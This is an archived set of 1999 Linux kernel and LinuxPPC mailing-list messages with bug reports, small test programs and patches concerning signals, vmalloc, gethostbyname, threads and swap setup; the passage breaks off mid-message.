  1 sibling, 0 replies; 200+ results
From: Tom Vier @ 1999-02-25  2:20 UTC (permalink / raw)
  To: Gary Thomas; +Cc: linuxppc-dev, mklinux-development-system


On Wed, 24 Feb 1999, Gary Thomas wrote:

> Sadly he can't use that modutils package as it's only for 2.1.xx and 2.2.xx
> kernels.
> 
> Tom,  Can you try the 2.2.xx kernels and see if they work for you?
> This would 
> be a much better way to spend your time rather than looking after a quite old
> kernel.

actually modutils 2.1.121 works, except of course for kerneld. 8)
unfortunately, linuxppc won't (yet) run on my 7100/80 and mk doesn't
(yet) run 2.2.x

--
Tom Vier - 0x82B007A8
thomass@erols.com        | goto the Zero Page at:
Tortured Souls Software  | http://www.erols.com/thomassr/zero/




[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* signal handling bug demo....
@ 1999-02-25 11:39 57% D.J. Barrow
  0 siblings, 0 replies; 200+ results
From: D.J. Barrow @ 1999-02-25 11:39 UTC (permalink / raw)
  To: linuxppc-dev, Gary Thomas, Lauro Whately

[-- Attachment #1: Type: text/plain, Size: 1528 bytes --]

Here is a demonstration of the bug I described in earlier mails about signals being lost by the kernel.
I am now quite sure the bug will manifest itself in all variants of linux unless the signal dispatching has changed radically. The code is I believe posix compilant ( Thanks Lauro ).

The bug arises when (sig)longjmp gets called out of a signal handler sys_sigreturn dosen't get called & the signals queued on the user stack get trashed.


To Demo:
put parent.c child.c & testmake in the same
directory. Compile using testmake  run parent.
Note "the bug" that only one signal gets delivered per loop of the child.

This bug I believe can be fixed by simplifing the kernel. There is no reason  (I'm aware of ) to queue the signals on the user stack sys_sigreturn gets called in the kernel for every signal delivered so this queueing is fundamentally a braindamaged idea.


The bug can be fixed I believe by
1) Removeing the while loop in do signal 
2) Removing the current sys_sigreturn
3) Making do_signal also function as sys_sigreturn.
4) Remove handle_signal.
5) Unblock the signal before delivering it ( this would enable longjmp out of signal handlers to behave correctly also ) rather than leaving the signal blocked forever.

So no do_signal will get called for each signal delivered. The thing would be a lot stabiler & use less userstack & remove -200 lines of really crap code.





_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com

[-- Attachment #2: child.c --]
[-- Type: application/octet-stream, Size: 284 bytes --]

#include <stdio.h>
#include <signal.h>
#include <setjmp.h>

int main(int argc,char *argv[])
{
   int cnt;
   printf("In child\n");
   for(cnt=0;cnt<30;cnt++)
   {
      printf("looping in child\n");
      kill(getppid(),SIGUSR1);
      kill(getppid(),SIGUSR2);
      sleep(1);
   }
}

[-- Attachment #3: parent.c --]
[-- Type: application/octet-stream, Size: 634 bytes --]

#include <stdio.h>
#include <signal.h>
#include <setjmp.h>

sigjmp_buf genv;

void mysignal(int sig)
{
  printf("received signal %d\n",sig);
  siglongjmp(genv,1);
}


int main(int argc,char *argv[])
{
  int childpid;

  signal(SIGUSR1,mysignal);
  signal(SIGUSR2,mysignal);
  if((childpid=fork())==-1)
  {
      printf("fork failed\n");
      exit(-1);
  }
  else if(childpid==0)
  {
      printf("execlping child pid=%d",getpid());
      if(execlp("./child","./child",(char *)0)==-1)
      {
	 printf("execlp failed");
	 exit(-1);
      }
  }
  sigsetjmp(genv,1);
  for(;;)
  {
    printf("looping in parent\n");
    sleep(1);
  }
}

[-- Attachment #4: testmake --]
[-- Type: application/octet-stream, Size: 107 bytes --]

gcc -D__USE_BSD_SIGNAL -D__USE_BSD child.c -o child
gcc -D__USE_BSD_SIGNAL -D__USE_BSD  parent.c -o parent

^ permalink raw reply	[relevance 57%]

* Bug in G3 serial - stty causes total lockup
@ 1999-02-26 16:13 64% puetzk6715
  0 siblings, 0 replies; 200+ results
From: puetzk6715 @ 1999-02-26 16:13 UTC (permalink / raw)
  To: linuxppc-dev


I just moved my printer from a Localtalk network to my Linux box. I then
BootX'ed into Linux (1.0.2b4 and Pauls 2.2.1) to try the HP 660C
instructions from the FAQ-o-Matic. However, attempting to use stty raw
57600 -echo crtscts < /dev/ttyS1 completely locked up the machine. I
rebooted (OF-boot), and all worked fine. Went back to MacOS, BootX'ed (I
wanted to see if this was the problem), and... it locked up again. 

I finally turned off LocalTalk on the MacOS (which I was going to do
anyway now that the printer is directly connected) and now stty works
reliably after BootX. However, I don't like Linux to crash, even in
uunrealistic situations (like changing the speed on a port MacOS thought
was LocalTalk). Anyone want to look at this? I'm afreaid of the
kernel-code...


[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* Re: PATCH - bug in vfree
  1999-02-20 12:14 64% ` Neil Booth
@ 1999-02-27  2:39 64%   ` Neil Booth
  0 siblings, 0 replies; 200+ results
From: Neil Booth @ 1999-02-27  2:39 UTC (permalink / raw)
  To: linux-mm, Andrea Arcangeli

Andrea Arcangeli wrote:

> Hmm, when I checked it one year ago I didn't seen a way the bug could
> corrupt memory.

Yes, you missed my retraction of that bit below.

Neil.

Neil Booth wrote:
> 
> Neil Booth wrote:
> 
> > More deeply:- Close inspection of get_vm_area reveals that
> > (intentionally?) it does NOT insist there be a cushion page behind a VMA
> > that is placed in front of a previously-allocated VMA, it ONLY
> > guarantees that a cushion page lies in front of newly-allocated VMAs.
> 
> Sorry, this is not correct (mistook < for <=). The bug report is
> correct, though.
> 
> Neil.
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* Re: bug in arch/ppc/mm/init.c
  1999-01-30 15:05 64% bug in arch/ppc/mm/init.c Loic Prylli
@ 1999-03-03  5:19 64% ` Paul Mackerras
  0 siblings, 0 replies; 200+ results
From: Paul Mackerras @ 1999-03-03  5:19 UTC (permalink / raw)
  To: Loic.Prylli; +Cc: linuxppc-dev


Loic Prylli <Loic.Prylli@ens-lyon.fr> wrote:

> The init function of some drivers use ioremap, which may call
> MMU_get_page (if the target zone cross a 4Mbyte/s bounday(. But
> MMU_get_page is marked as an initfunc, so it is no longer
> present->panic.

You're right, MMU_get_page shouldn't be an initfunc.

> Here one possible solution:
> 
> --- arch/ppc/mm/init.c~ Thu Jan  7 21:06:57 1999
> +++ arch/ppc/mm/init.c  Sat Jan 30 16:01:17 1999
> @@ -883,7 +883,7 @@
>         }           
>  }
>  
> -__initfunc(static void *MMU_get_page(void))
> +static void *MMU_get_page(void)
>  {
>         void *p;
>  

Looks good to me.

Paul.

[[ This message was sent via the linuxppc-dev mailing list. Replies are ]]
[[ not forced back to the list, so be sure to  Cc linuxppc-dev  if your ]]
[[ reply is of general interest. To unsubscribe from linuxppc-dev, send ]]
[[ the message 'unsubscribe' to linuxppc-dev-request@lists.linuxppc.org ]]

^ permalink raw reply	[relevance 64%]

* [linux-lvm] Bug in the Major number increments?
@ 1999-03-31 20:14 64% FryarD
  0 siblings, 0 replies; 200+ results
From: FryarD @ 1999-03-31 20:14 UTC (permalink / raw)
  To: linux-lvm



In experimentation with LVM on RH5.2 I noticed that everytime I create the first
two logical volumes they get the exact same major number. This results in one of
the volume not valid or mountable. I have not examined it enough yet, however, I
suspect that the increment i++ is incorrectly using the same number before
incrementing. Any thoughts? Is there something I am missing? Also it might be a
good idea to add a line to the makefile to create /etc/lvmtab.d. I fiddled
around with LVM for a while getting invalid protocol before discovering that you
had to create this directory by hand before it would work.


TIA
Dexter Fryar

^ permalink raw reply	[relevance 64%]

* Bug in LinuxThreads?
@ 1999-04-01 15:18 53% Charles A. Jolley
  1999-04-01 18:57 64% ` Kevin B. Hendricks
  0 siblings, 1 reply; 200+ results
From: Charles A. Jolley @ 1999-04-01 15:18 UTC (permalink / raw)
  To: linuxppc-dev


Hi all:
    I apologize if this is too off topic, but I am trying to figure out
where to go in order to get this problem fixed and this listserv seemed to
be the best place.  A few days ago I posted the attached message below to
the comp.programming.threads newsgroup in relation to a problem I've been
having with running a piece of threaded code I've written on a standard R4
installation (running the 2.1.125) kernel.  The issue is described is detail
below.

    I have had a few responses back from people telling me they compiled the
included code on an Intel box and it worked fine.  This leads me to believe
there might be a bug in the pthreads or kernel (probably pthreads) code that
is causing the problem.  My question: is there an update that I have missed,
or whom do I need to contact to work on getting this thing fixed.  I don't
mind working on finding the bug myself, I'm just not even sure of where I
can find the pthreads source code for LinuxPPC!

Thanks,
-Charles

-------------------------------------------------ATTACHED MESSAGE--------

Hi,

I have been trying to write a program that involves a thread pool which,
over the course of the operation of the program, will create and exit
several threads.  I am finding that if I have exited any threads during
the program run, then it hangs upon exiting from main().  [Specifically,
GDB shows it hanging in the function pthread_exit_process(), which is
called automatically by the tear-down code, I presume.]

I can't figure out why it is doing this and if there is anything that I
need to do or if it is a bug in this version or what.  I am currently
running the 4.2 release of LinuxPPC (2.1.125 kernel, based on the 5.0
RedHat release) with lib6 and egcs (so when I use C++, this should not
be a problem) and I am doing the normal _REENTRANT/-lpthreads linking
thing.

I have included some code below that will cause the problem to occur
when compiled.  Any help is greatly appreciated.

Thanks,
-Charles

----
NON-FUNCTIONAL CODE
Compiled with "gcc -D_REENTRANT -s -o buggy1 buggy1.c -lpthreads"

--NOTE THE LINE TO UNCOMMENT THAT WILL MAKE THE PROGRAM "WORK"; i.e. it
will now exit normally, but this is obviously not a real fix.--

----

/* --- Messed up Threading Code Begins --- */

#include <pthread.h>
#include <stdio.h>

void *thread_routine(void *arg)
{
/*      while(1) ; //Uncomment this (so thread doesn't die) and proc
exits! */
        return (void*)3 ;
}

main ()
{
        pthread_t thread_id ;
        void *thread_result ;
        int status ;

        status = pthread_create(
                &thread_id, NULL, thread_routine, NULL) ;
        if (status!=0) {
                printf("Create Thread!\n") ;
                exit(1) ;
        }

        status = pthread_detach(thread_id) ;
        if (status!=0) {
                printf("Detach Thread!\n") ;
                exit(1) ;
        }

        sleep(1) ;
        return 1 ;
}

/* --- Messed up Thread Code Ends --- */

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 53%]

* Re: Bug in LinuxThreads?
  1999-04-01 15:18 53% Bug in LinuxThreads? Charles A. Jolley
@ 1999-04-01 18:57 64% ` Kevin B. Hendricks
  0 siblings, 0 replies; 200+ results
From: Kevin B. Hendricks @ 1999-04-01 18:57 UTC (permalink / raw)
  To: Charles A. Jolley; +Cc: linuxppc-dev


Hi,

I ran your test program under R4.1 and with the very latest glibc 1.99 rpm from
Gary Thomas and it worked fine. (exited properly)

By the way, your comment in the code about how to compile is wrong (it is
libpthread.so NOT libpthreads.so) so -lpthread no -lpthreads

I have made a few changes to linuxthreads to improve performance with the JDK
1.2 native threads.  Please try with Gary's latest glibc 1.99 rpm (which has
libpthread in it).  It that doesn't work, I will post my libpthread.so and
libpthread.a for you to try.

If only my version works for you, I will post the diffs for you and you can roll
your own.

I hope this helps.

Kevin

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* HAL2 spec bug
@ 1999-04-06 16:31 64% Ulf Carlsson
  0 siblings, 0 replies; 200+ results
From: Ulf Carlsson @ 1999-04-06 16:31 UTC (permalink / raw)
  To: Linux SGI

The DMA noise problem was actually a specification bug. I should not configure
cfgdma as a 16 bit device as the specification explicitly tells me to do. If
it's configured for 16 bit DMA transfers are the low 8 bits just dumped or
replaced with a noise if they differ from the upper 8 bits.

It's kind of hard to write a decent driver when the spec lies for me..

- Ulf

^ permalink raw reply	[relevance 64%]

* boundary condition bug fix for vmalloc()
@ 1999-04-22  0:12 64% Kanoj Sarcar
  1999-04-22 15:30 64% ` Patch: " Stephen C. Tweedie
  0 siblings, 1 reply; 200+ results
From: Kanoj Sarcar @ 1999-04-22  0:12 UTC (permalink / raw)
  To: Linux-MM, linux-kernel

Hi,

Under heavy load conditions, get_vm_area() might end up allocating an
address range beyond VMALLOC_END. The problem is after the for loop
in get_vm_area() terminates, no consistency check (addr > VMALLOC_END
- size) is performed on the "addr". 

I believe the following patch will fix the problem:

--- vmalloc.old		Wed Apr 21 16:52:05 1999
+++ mm/vmalloc.c	Wed Apr 21 16:53:08 1999
@@ -161,11 +161,11 @@
        for (p = &vmlist; (tmp = *p) ; p = &tmp->next) {
                if (size + addr < (unsigned long) tmp->addr)
                        break;
+               addr = tmp->size + (unsigned long) tmp->addr;
                if (addr > VMALLOC_END-size) {
                        kfree(area);
                        return NULL;
                }
-               addr = tmp->size + (unsigned long) tmp->addr;
        }
        area->addr = (void *)addr;
        area->size = size + PAGE_SIZE;
 
Please let me know if this patch is pulled into the source tree, 
so I can update my tree.

Thanks.

Kanoj
kanoj@engr.sgi.com
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* Patch: Re: boundary condition bug fix for vmalloc()
  1999-04-22  0:12 64% boundary condition bug fix for vmalloc() Kanoj Sarcar
@ 1999-04-22 15:30 64% ` Stephen C. Tweedie
  0 siblings, 0 replies; 200+ results
From: Stephen C. Tweedie @ 1999-04-22 15:30 UTC (permalink / raw)
  To: Kanoj Sarcar, Linus Torvalds, Alan Cox; +Cc: Linux-MM, linux-kernel

Hi,

On Wed, 21 Apr 1999 17:12:37 -0700 (PDT), kanoj@google.engr.sgi.com
(Kanoj Sarcar) said:

> Under heavy load conditions, get_vm_area() might end up allocating an
> address range beyond VMALLOC_END. The problem is after the for loop in
> get_vm_area() terminates, no consistency check (addr > VMALLOC_END -
> size) is performed on the "addr".

Agreed, and the patch looks OK.  Moving the test outside the for loop
entirely has the same effect while shaving a few cycles off the
function.  The existing clearly broken in not checking the size of the
final area if we ran off the end of the vm_area chain.

--Stephen

----------------------------------------------------------------
--- mm/vmalloc.c~	Mon Jan 18 18:19:28 1999
+++ mm/vmalloc.c	Thu Apr 22 16:12:58 1999
@@ -161,11 +161,11 @@
 	for (p = &vmlist; (tmp = *p) ; p = &tmp->next) {
 		if (size + addr < (unsigned long) tmp->addr)
 			break;
-		if (addr > VMALLOC_END-size) {
-			kfree(area);
-			return NULL;
-		}
 		addr = tmp->size + (unsigned long) tmp->addr;
+	}
+	if (addr > VMALLOC_END-size) {
+		kfree(area);
+		return NULL;
 	}
 	area->addr = (void *)addr;
 	area->size = size + PAGE_SIZE;
----------------------------------------------------------------
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* [BUG] in glibc-2.1.1-6b: gethostbyname broken
@ 1999-05-08 12:20 63% Martin Costabel
  1999-05-09 22:20 64% ` Franz Sirl
  0 siblings, 1 reply; 200+ results
From: Martin Costabel @ 1999-05-08 12:20 UTC (permalink / raw)
  To: linuxppc-dev; +Cc: Tom Rini

[-- Attachment #1: Type: text/plain, Size: 632 bytes --]


Under glibc-2.1.1-6b, I cannot do an NFS-mount using the numeric IP
address of the server. Without even consulting the net, mount says:
  mount: can't get address for xx.xx.xx.xx

Under glibc-2.1.1-5b, it works correctly.

I tracked this down to gethostbyname, which doesn't work correctly when
fed a numeric IP address.

If I run the the attached program as
 tstgethbn 193.252.19.78 
I get a correct result when glibc-2.1.1-5b.ppc.rpm is installed, and an
error when glibc-2.1.1-6b.ppc.rpm is installed. Both rpms are from
mirror.linuxppc.org.

Could someone who knows what changed between 5b and 6b please look into
this?

Martin

[-- Attachment #2: tstgethbn.c --]
[-- Type: text/plain, Size: 890 bytes --]

/* tstgethbn.c
   Test for gesthostbyname */

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
 
int main(int argc, char** argv)
{
   char hostname[65];
   struct hostent *he = NULL;
   struct hostent *he2 = NULL;
   extern int h_errno;
 
   strcpy(hostname, argv[1]);
   printf( " Looking up %s\n", hostname );
 
   he = gethostbyname(hostname);
   if ( h_errno ) {
       printf(" error %d\n", h_errno);
       herror(hostname);
   } 

   if ( he == NULL ){
       printf("No hostname found\n");
      exit(1);
   }

    printf( "\t      Hostname: %s\n", he->h_name );
 
   if ( he->h_addr_list[0] != NULL )
     printf("\t       Address: %s \n", 
	    inet_ntoa(*(struct in_addr *) he->h_addr_list[0]));

   he2 = gethostbyaddr( he->h_addr_list[0], he->h_length, he->h_addrtype );
   printf( "\t          Name: %s\n", he2->h_name );

   exit(0);
}
  

^ permalink raw reply	[relevance 63%]

* Re: [BUG] in glibc-2.1.1-6b: gethostbyname broken
  1999-05-08 12:20 63% [BUG] in glibc-2.1.1-6b: gethostbyname broken Martin Costabel
@ 1999-05-09 22:20 64% ` Franz Sirl
  0 siblings, 0 replies; 200+ results
From: Franz Sirl @ 1999-05-09 22:20 UTC (permalink / raw)
  To: Martin Costabel, linuxppc-dev; +Cc: Tom Rini


Am Sat, 08 May 1999 schrieb Martin Costabel:
>>
>Under glibc-2.1.1-6b, I cannot do an NFS-mount using the numeric IP
>address of the server. Without even consulting the net, mount says:
>  mount: can't get address for xx.xx.xx.xx
>
>Under glibc-2.1.1-5b, it works correctly.
>
>I tracked this down to gethostbyname, which doesn't work correctly when
>fed a numeric IP address.
>
>If I run the the attached program as
> tstgethbn 193.252.19.78 
>I get a correct result when glibc-2.1.1-5b.ppc.rpm is installed, and an
>error when glibc-2.1.1-6b.ppc.rpm is installed. Both rpms are from
>mirror.linuxppc.org.
>
>Could someone who knows what changed between 5b and 6b please look into
>this?

Fixed in glibc-2.1.1-6c. This was a general bug in glibc-2.1.1pre2, I've
updated to a current glibc CVS snapshot which fixes it.

Thanks for your report.

Franz.

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* Indy SC bug
@ 1999-05-10 18:56 64% Ulf Carlsson
  0 siblings, 0 replies; 200+ results
From: Ulf Carlsson @ 1999-05-10 18:56 UTC (permalink / raw)
  To: Linux SGI

Hi all,

I've found a silly bug in the R4600SC caching routines. It wiped the whole cache
at wrap arounds even if you just tried to write back two cache lines (for
example the last cache line and the first cache line).

I can't understand how this bug has lasted so long in the kernel. Well, now that
I've sorted it out, your R4600SC machine be A LOT faster.

- Ulf

^ permalink raw reply	[relevance 64%]

* Re: Swap Questions (includes possible bug) - swapfile.c / swap.c
       [not found]     <Pine.LNX.4.03.9905111114210.19954-100000@baltimore.wwaves.com>
@ 1999-05-11 21:30 61% ` Rik van Riel
  1999-05-12 15:42 58%   ` [PATCH] " Joseph Pranevich
  0 siblings, 1 reply; 200+ results
From: Rik van Riel @ 1999-05-11 21:30 UTC (permalink / raw)
  To: Joseph Pranevich; +Cc: Linux Kernel, Linux MM

On Tue, 11 May 1999, Joseph Pranevich wrote:

> I've been gradually sifting my way through the kernel source and I
> have a few minor questions about memory management.

linux-mm@kvack.org	(majordomo-managed)
http://www.linux.eu.org/Linux-MM/

> 1) swap.c : page clustering?

> 	else
> 		page_cluster = 4;
> 
> This is fine, but wouldn't it make sense to generalize this, or is
> the benifit not as great with larger amounts of ram?

The swapOUT clustering is only done to a maximum of 32 (2^5)
pages, so it doesn't make much sense to read in more pages
(which are probably unrelated to the current process).

For mmap() reading we might want to switch to a smarter
algorithm though. Not with reading in more pages, but with
reading in the _next_ area while the program is still busy
processing this one. The idea is to have all data in memory
just before the process needs it :)


> 2) swapfile.c : sys_swapon() question 1
> 
> I'm unable to figure out exactly what this code is supposed to be
> doing. Can someone help me out here? I don't understand why we set
> the blocksize twice or what the funniness is with "filp"
> 
> 		p->swap_device = swap_dentry->d_inode->i_rdev;
> 		set_blocksize(p->swap_device, PAGE_SIZE);

We do I/O on this device in chunks of PAGE_SIZE.

> 		filp.f_dentry = swap_dentry;
> 		filp.f_mode = 3; /* read write */

Of course, we want to have our swap device read-write and we
mark it with a magic number so no harm will come to it...

> 		set_blocksize(p->swap_device, PAGE_SIZE);

Hmm, haven't we seen this one before? Stephen?


> I do apologise for the many questions, I'm just trying to get a
> feel for the swapping subsystem. I apologise if this is already
> documented someplace.

AFAIK it's not yet documented. I'd really appreciate it
if you could do that and send me the docs for inclusion
on the Linux-MM site...

cheers,

Rik -- Open Source: you deserve to be in control of your data.
+-------------------------------------------------------------------+
| Le Reseau netwerksystemen BV:               http://www.reseau.nl/ |
| Linux Memory Management site:   http://www.linux.eu.org/Linux-MM/ |
| Nederlandse Linux documentatie:          http://www.nl.linux.org/ |
+-------------------------------------------------------------------+

--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 61%]

* Re: Swap Questions (includes possible bug) - swapfile.c / swap.c
@ 1999-05-12 10:30 64% Manfred Spraul
  1999-05-12 18:36 64% ` Stephen C. Tweedie
  0 siblings, 1 reply; 200+ results
From: Manfred Spraul @ 1999-05-12 10:30 UTC (permalink / raw)
  To: Rik van Riel, Joseph Pranevich; +Cc: Linux Kernel, Linux MM

>On Tue, 11 May 1999, Joseph Pranevich wrote:
> case 2:
>  error = -EINVAL;
>  if (swap_header->info.nr_badpages > MAX_SWAP_BADPAGES)
>  goto bad_swap;

MAX_SWAP_BADPAGES is a limitation of the swap format 2,
it's not a kernel limitation. (check include/linux/swap.h)
 
Rik wrote:
>On Tue, 11 May 1999, Joseph Pranevich wrote:
>> set_blocksize(p->swap_device, PAGE_SIZE);
>
>Hmm, haven't we seen this one before? Stephen?


There is another problem with this line:
set_blocksize() also means that the previous block size
doesn't work anymore:
if you accidentially enter 'swapon /dev/hda1' (my root drive)
instead of 'swapon /dev/hda3', then you have to fsck:
sys_swapon sets the blocksize, then it rejects the call
because there is no swap signature, but now ext2
can't access the partition (blocksize 4096, ext2 needs 1024).

I've posted a patch a few weeks ago, but I received no reply.

Are such problems ignored? (The super user can crash the
machine at will, one more crash doesn't matter)

Regards,
    Manfred

--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* [PATCH] Re: Swap Questions (includes possible bug) - swapfile.c / swap.c
  1999-05-11 21:30 61% ` Swap Questions (includes possible bug) - swapfile.c / swap.c Rik van Riel
@ 1999-05-12 15:42 58%   ` Joseph Pranevich
  0 siblings, 0 replies; 200+ results
From: Joseph Pranevich @ 1999-05-12 15:42 UTC (permalink / raw)
  To: Rik van Riel; +Cc: Linux MM

Hello,

Based on what was said below, does this make sense? In addition, I added
the case where we have >32 megs of RAM and we may want to change
page_cluster to 5 (which, if I understand your message, is the highest
that we could reasonably want it.)

We could, in theroy, do this better and have it working on the fly based
on the swap out page cluster size as a maximum, but there doesn't appear
to be a benefit at this point. If however (and I haven't checked) the
maximum is architechture-dependant, it would definately be advantagous to
generalize this further.

(I do have most of the code written to do that for my own personal
justification. But I don't yet check for an upper bound.)

Joe

--- swap.c.old	Tue May 11 17:42:02 1999
+++ swap.c	Wed May 12 09:29:49 1999
@@ -11,6 +11,7 @@
  * Started 18.12.91
  * Swap aging added 23.2.95, Stephen Tweedie.
  * Buffermem limits added 12.3.98, Rik van Riel.
+ * Additional documentation/code added 5.11.99, Joseph Pranevich
  */
 
 #include <linux/mm.h>
@@ -70,11 +71,31 @@
 
 void __init swap_setup(void)
 {
-	/* Use a smaller cluster for memory <16MB or <32MB */
+	/* The number for page_cluster can be aproximately determined
+	   using the formula:
+
+		floor ( log2(M / 4) )
+
+	   Where M is the size of memory in megabytes.
+	
+	   However, the maximum page_cluster value for swapping out
+	   is 5, so it does not make sense to have a higher value here
+	   unless that is changed. We also do not ever want to have
+	   page_cluster be less than 2.
+
+	   With those constraints in mind, we have chosen to implement
+	   this like a switch and not calculate the value in code. This
+	   should hopefully make this more readable. However, if the 
+	   maximum cluster value for swapping out is increased, it may
+	   make sense to generalize this code then.
+	*/
+
 	if (num_physpages < ((16 * 1024 * 1024) >> PAGE_SHIFT))
 		page_cluster = 2;
 	else if (num_physpages < ((32 * 1024 * 1024) >> PAGE_SHIFT))
 		page_cluster = 3;
-	else
+	else if (num_physpages < ((64 * 1024 * 1024) >> PAGE_SHIFT))
 		page_cluster = 4;
+	else 
+		page_cluster = 5;
 }



On Tue, 11 May 1999, Rik van Riel wrote:

> On Tue, 11 May 1999, Joseph Pranevich wrote:
> 
> > I've been gradually sifting my way through the kernel source and I
> > have a few minor questions about memory management.
> 
> linux-mm@kvack.org	(majordomo-managed)
> http://www.linux.eu.org/Linux-MM/
> 
> > 1) swap.c : page clustering?
> 
> > 	else
> > 		page_cluster = 4;
> > 
> > This is fine, but wouldn't it make sense to generalize this, or is
> > the benifit not as great with larger amounts of ram?
> 
> The swapOUT clustering is only done to a maximum of 32 (2^5)
> pages, so it doesn't make much sense to read in more pages
> (which are probably unrelated to the current process).
> 
> For mmap() reading we might want to switch to a smarter
> algorithm though. Not with reading in more pages, but with
> reading in the _next_ area while the program is still busy
> processing this one. The idea is to have all data in memory
> just before the process needs it :)
> 
> 
> > 2) swapfile.c : sys_swapon() question 1
> > 
> > I'm unable to figure out exactly what this code is supposed to be
> > doing. Can someone help me out here? I don't understand why we set
> > the blocksize twice or what the funniness is with "filp"
> > 
> > 		p->swap_device = swap_dentry->d_inode->i_rdev;
> > 		set_blocksize(p->swap_device, PAGE_SIZE);
> 
> We do I/O on this device in chunks of PAGE_SIZE.
> 
> > 		filp.f_dentry = swap_dentry;
> > 		filp.f_mode = 3; /* read write */
> 
> Of course, we want to have our swap device read-write and we
> mark it with a magic number so no harm will come to it...
> 
> > 		set_blocksize(p->swap_device, PAGE_SIZE);
> 
> Hmm, haven't we seen this one before? Stephen?
> 
> 
> > I do apologise for the many questions, I'm just trying to get a
> > feel for the swapping subsystem. I apologise if this is already
> > documented someplace.
> 
> AFAIK it's not yet documented. I'd really appreciate it
> if you could do that and send me the docs for inclusion
> on the Linux-MM site...
> 
> cheers,
> 
> Rik -- Open Source: you deserve to be in control of your data.
> +-------------------------------------------------------------------+
> | Le Reseau netwerksystemen BV:               http://www.reseau.nl/ |
> | Linux Memory Management site:   http://www.linux.eu.org/Linux-MM/ |
> | Nederlandse Linux documentatie:          http://www.nl.linux.org/ |
> +-------------------------------------------------------------------+
> 

--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 58%]

* Re: Swap Questions (includes possible bug) - swapfile.c / swap.c
  1999-05-12 10:30 64% Manfred Spraul
@ 1999-05-12 18:36 64% ` Stephen C. Tweedie
  1999-05-12 19:45 44%   ` Manfred Spraul
  0 siblings, 1 reply; 200+ results
From: Stephen C. Tweedie @ 1999-05-12 18:36 UTC (permalink / raw)
  To: Manfred Spraul; +Cc: Rik van Riel, Joseph Pranevich, Linux Kernel, Linux MM

Hi,

On Wed, 12 May 1999 12:30:27 +0200, "Manfred Spraul"
<masp0008@stud.uni-sb.de> said:

> There is another problem with this line:
> set_blocksize() also means that the previous block size
> doesn't work anymore:
> if you accidentially enter 'swapon /dev/hda1' (my root drive)
> instead of 'swapon /dev/hda3', then you have to fsck:

Yep, it would make perfect sense to move the set_blocksize to be after
the EBUSY check.

--Stephen
--
To unsubscribe, send a message with 'unsubscribe linux-mm my@address'
in the body to majordomo@kvack.org.  For more info on Linux MM,
see: http://humbolt.geo.uu.nl/Linux-MM/

^ permalink raw reply	[relevance 64%]

* Re: Swap Questions (includes possible bug) - swapfile.c / swap.c
  1999-05-12 18:36 64% ` Stephen C. Tweedie
@ 1999-05-12 19:45 44%   ` Manfred Spraul
  0 siblings, 0 replies; 200+ results
From: Manfred Spraul @ 1999-05-12 19:45 UTC (permalink / raw)
  To: Stephen C. Tweedie
  Cc: Manfred Spraul, Rik van Riel, Joseph Pranevich, Linux Kernel,
	Linux MM

[-- Attachment #1: Type: text/plain, Size: 1432 bytes --]

"Stephen C. Tweedie" wrote:
> 
> Hi,
> 
> On Wed, 12 May 1999 12:30:27 +0200, "Manfred Spraul"
> <masp0008@stud.uni-sb.de> said:
> 
> > There is another problem with this line:
> > set_blocksize() also means that the previous block size
> > doesn't work anymore:
> > if you accidentially enter 'swapon /dev/hda1' (my root drive)
> > instead of 'swapon /dev/hda3', then you have to fsck:
> 
> Yep, it would make perfect sense to move the set_blocksize to be after
> the EBUSY check.

Unfortunately that doesn't solve the problem:
The current EBUSY check checks that the partition is not used as a
swap partition, it doesn't check the VFS, and it doesn't check
whether the RAID driver uses the volume.

I've attached an old patch (vs.2.2.6):
I've send that patch to linux-kernel@vger, Alan (..wait until Linus
returns from vacation..), Linus (no reply).

The patch adds a bitmap to the block cache for EBUSY checks.
Actually, we can use this bitmap for other bits if we use devfs and
